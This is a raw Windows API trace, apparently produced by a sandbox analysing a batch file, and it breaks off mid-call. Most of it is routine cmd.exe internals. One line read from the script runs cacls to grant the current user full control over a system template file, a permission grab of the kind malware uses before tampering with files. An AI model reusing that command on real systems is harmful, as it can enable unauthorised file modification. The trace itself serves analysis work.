GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0228.225] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0228.225] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0228.225] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0228.225] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0228.225] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0228.225] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0228.225] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0228.274] GetProcessHeap () returned 0x3f0000 [0228.274] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20c) returned 0x402f58 [0228.274] GetConsoleTitleW (in: lpConsoleTitle=0x402f58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0228.275] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0228.275] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0228.275] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0228.275] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0228.277] GetProcessHeap () returned 0x3f0000 [0228.277] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x400a) returned 0x406af0 [0228.277] GetProcessHeap () returned 0x3f0000 [0228.277] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x406af0 | out: hHeap=0x3f0000) returned 1 [0228.279] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0228.279] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0228.279] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0228.279] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0228.279] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0228.279] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0228.279] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0228.279] GetProcessHeap () returned 0x3f0000 [0228.279] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x403170 [0228.279] GetProcessHeap () returned 0x3f0000 [0228.279] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x72) returned 0x412b40 [0228.281] GetProcessHeap () returned 0x3f0000 [0228.281] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x80) returned 0x4031d0 [0228.282] GetConsoleTitleW (in: lpConsoleTitle=0x14f7e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0228.283] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0228.283] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0228.283] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0228.283] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0228.283] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0228.283] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0228.283] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0228.283] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0228.283] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0228.283] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0228.283] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0228.283] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0228.283] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0228.283] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0228.283] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0228.283] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0228.283] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0228.283] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0228.283] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0228.283] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0228.283] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0228.283] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0228.284] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0228.284] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0228.284] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0228.284] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0228.284] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0228.284] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0228.284] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0228.284] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0228.284] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0228.284] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0228.284] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0228.284] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0228.284] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0228.284] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0228.284] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0228.284] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0228.284] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0228.284] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0228.284] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0228.284] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0228.284] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0228.284] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0228.284] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0228.284] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0228.284] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0228.284] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0228.284] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0228.285] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0228.285] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0228.285] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0228.285] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0228.285] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0228.285] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0228.285] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0228.285] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0228.285] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0228.285] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0228.285] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0228.285] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0228.285] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0228.285] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0228.285] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0228.285] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0228.285] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0228.285] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0228.285] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0228.285] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0228.285] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0228.285] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0228.285] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0228.285] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0228.291] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0228.291] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0228.291] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0228.291] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0228.291] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0228.292] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0228.292] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0228.292] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0228.292] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0228.292] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0228.292] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0228.292] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0228.292] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0228.292] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0228.292] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0228.292] GetProcessHeap () returned 0x3f0000 [0228.292] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x210) returned 0x403258 [0228.292] GetProcessHeap () returned 0x3f0000 [0228.292] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xea) returned 0x403470 [0228.294] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0228.294] GetProcessHeap () returned 0x3f0000 [0228.294] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x418) returned 0x3f07f0 [0228.294] SetErrorMode (uMode=0x0) returned 0x0 [0228.295] SetErrorMode (uMode=0x1) returned 0x0 [0228.295] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x3f07f8, lpFilePart=0x14f300 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f300*="Desktop") returned 0x25 [0228.295] SetErrorMode (uMode=0x0) returned 0x1 [0228.295] GetProcessHeap () returned 0x3f0000 [0228.295] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x3f07f0, Size=0x6e) returned 0x3f07f0 [0228.295] GetProcessHeap () returned 0x3f0000 [0228.295] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x3f07f0) returned 0x6e [0228.295] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0228.295] GetProcessHeap () returned 0x3f0000 [0228.295] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x5a) returned 0x403568 [0228.295] GetProcessHeap () returned 0x3f0000 [0228.295] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xa8) returned 0x4035d0 [0228.295] GetProcessHeap () returned 0x3f0000 [0228.295] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4035d0, Size=0x5a) returned 0x4035d0 [0228.295] GetProcessHeap () returned 0x3f0000 [0228.295] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x4035d0) returned 0x5a [0228.295] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0228.295] GetProcessHeap () returned 0x3f0000 [0228.295] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xe0) returned 0x3f0868 [0228.300] GetProcessHeap () returned 0x3f0000 [0228.300] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x3f0868, Size=0x76) returned 0x3f0868 [0228.300] GetProcessHeap () returned 0x3f0000 [0228.300] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x3f0868) returned 0x76 [0228.300] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0228.301] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x14f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f09c) returned 0x403638 [0228.301] GetProcessHeap () returned 0x3f0000 [0228.301] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x14) returned 0x401810 [0228.301] FindClose (in: hFindFile=0x403638 | out: hFindFile=0x403638) returned 1 [0228.301] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0228.301] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0228.301] GetConsoleTitleW (in: lpConsoleTitle=0x14f574, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0228.409] GetProcessHeap () returned 0x3f0000 [0228.409] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x11c) returned 0x3f08e8 [0228.409] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0228.409] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0228.409] IdentifyCodeAuthzLevelW () returned 0x1 [0228.417] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0228.417] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0228.417] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0228.417] CloseCodeAuthzLevel () returned 0x1 [0228.418] SetErrorMode (uMode=0x0) returned 0x0 [0228.418] SetErrorMode (uMode=0x1) returned 0x0 [0228.418] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x403260, lpFilePart=0x14f460 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x14f460*="Ch81ANBE.bat") returned 0x32 [0228.418] SetErrorMode (uMode=0x0) returned 0x1 [0228.418] GetProcessHeap () returned 0x3f0000 [0228.418] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x72) returned 0x412bc0 [0228.418] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\"", _Control=" \x09") returned 0x1 [0228.418] GetProcessHeap () returned 0x3f0000 [0228.418] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x7e) returned 0x3f1140 [0228.418] GetProcessHeap () returned 0x3f0000 [0228.418] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xf4) returned 0x3f11c8 [0228.418] GetProcessHeap () returned 0x3f0000 [0228.419] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x3f11c8, Size=0x80) returned 0x3f11c8 [0228.419] GetProcessHeap () returned 0x3f0000 [0228.419] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x3f11c8) returned 0x80 [0228.419] CmdBatNotification () returned 0x4032c2 [0228.419] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14f4a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0228.420] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0228.420] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.420] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0228.420] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.420] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0228.420] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14f488, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x14f488*=0xe2, lpOverlapped=0x0) returned 1 [0228.421] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0228.421] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0228.422] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.422] GetFileType (hFile=0x78) returned 0x1 [0228.422] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.422] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0228.423] GetProcessHeap () returned 0x3f0000 [0228.423] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x400a) returned 0x406af0 [0228.423] GetProcessHeap () returned 0x3f0000 [0228.423] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x4008) returned 0x414b28 [0228.423] GetProcessHeap () returned 0x3f0000 [0228.423] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1a) returned 0x405840 [0228.423] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0228.423] GetProcessHeap () returned 0x3f0000 [0228.423] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x405840 | out: hHeap=0x3f0000) returned 1 [0228.423] GetProcessHeap () returned 0x3f0000 [0228.423] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414b28 | out: hHeap=0x3f0000) returned 1 [0228.423] GetProcessHeap () returned 0x3f0000 [0228.423] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x406af0 | out: hHeap=0x3f0000) returned 1 [0228.424] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0228.424] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0228.424] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0228.424] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0228.424] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0228.424] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0228.424] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0228.424] GetProcessHeap () returned 0x3f0000 [0228.424] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x3f1250 [0228.424] GetProcessHeap () returned 0x3f0000 [0228.424] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x14) returned 0x3f0ab8 [0228.427] GetProcessHeap () returned 0x3f0000 [0228.427] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xc0) returned 0x404190 [0228.428] _tell (_FileHandle=3) returned 32 [0228.428] _close (_FileHandle=3) returned 0 [0228.428] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f25c | out: _Buffer="\r\n") returned 2 [0228.428] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.428] GetFileType (hFile=0x7) returned 0x2 [0228.429] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.429] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f21c | out: lpMode=0x14f21c) returned 1 [0228.429] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.429] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f248, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f248*=0x2) returned 1 [0228.430] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0228.430] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0228.430] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14f258 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0228.430] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14f258 | out: _Buffer=">") returned 1 [0228.430] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.430] GetFileType (hFile=0x7) returned 0x2 [0228.431] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.431] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f220 | out: lpMode=0x14f220) returned 1 [0228.431] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.431] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14f24c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x14f24c*=0x26) returned 1 [0228.432] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.432] GetFileType (hFile=0x7) returned 0x2 [0228.432] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.432] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f4a4 | out: lpMode=0x14f4a4) returned 1 [0228.433] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.433] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3f0ac0*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x14f4d0, lpReserved=0x0 | out: lpBuffer=0x3f0ac0*, lpNumberOfCharsWritten=0x14f4d0*=0x5) returned 1 [0228.433] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14f4dc | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 92 [0228.433] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.433] GetFileType (hFile=0x7) returned 0x2 [0228.434] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.434] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f49c | out: lpMode=0x14f49c) returned 1 [0228.434] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.434] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x5c, lpNumberOfCharsWritten=0x14f4c8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4c8*=0x5c) returned 1 [0228.435] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f4fc | out: _Buffer="\r\n") returned 2 [0228.435] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.435] GetFileType (hFile=0x7) returned 0x2 [0228.435] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.435] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f4bc | out: lpMode=0x14f4bc) returned 1 [0228.435] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.435] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f4e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4e8*=0x2) returned 1 [0228.436] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0228.436] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0228.436] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0228.436] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0228.436] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0228.436] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0228.436] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0228.436] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0228.436] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0228.436] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0228.436] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0228.436] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0228.436] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0228.436] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0228.436] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0228.436] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0228.437] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0228.437] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0228.437] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0228.437] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0228.437] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0228.437] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0228.437] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0228.437] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0228.437] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0228.437] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0228.437] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0228.437] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0228.437] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0228.437] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0228.437] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0228.437] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0228.437] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0228.437] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0228.437] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0228.437] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0228.437] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0228.437] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0228.437] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0228.438] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0228.438] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0228.438] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0228.438] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0228.438] GetProcessHeap () returned 0x3f0000 [0228.438] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x418) returned 0x404258 [0228.438] SetErrorMode (uMode=0x0) returned 0x0 [0228.438] SetErrorMode (uMode=0x1) returned 0x0 [0228.438] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x404260, lpFilePart=0x14f2a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f2a0*="Desktop") returned 0x25 [0228.438] SetErrorMode (uMode=0x0) returned 0x1 [0228.438] GetProcessHeap () returned 0x3f0000 [0228.439] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x404258, Size=0x60) returned 0x404258 [0228.439] GetProcessHeap () returned 0x3f0000 [0228.439] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, 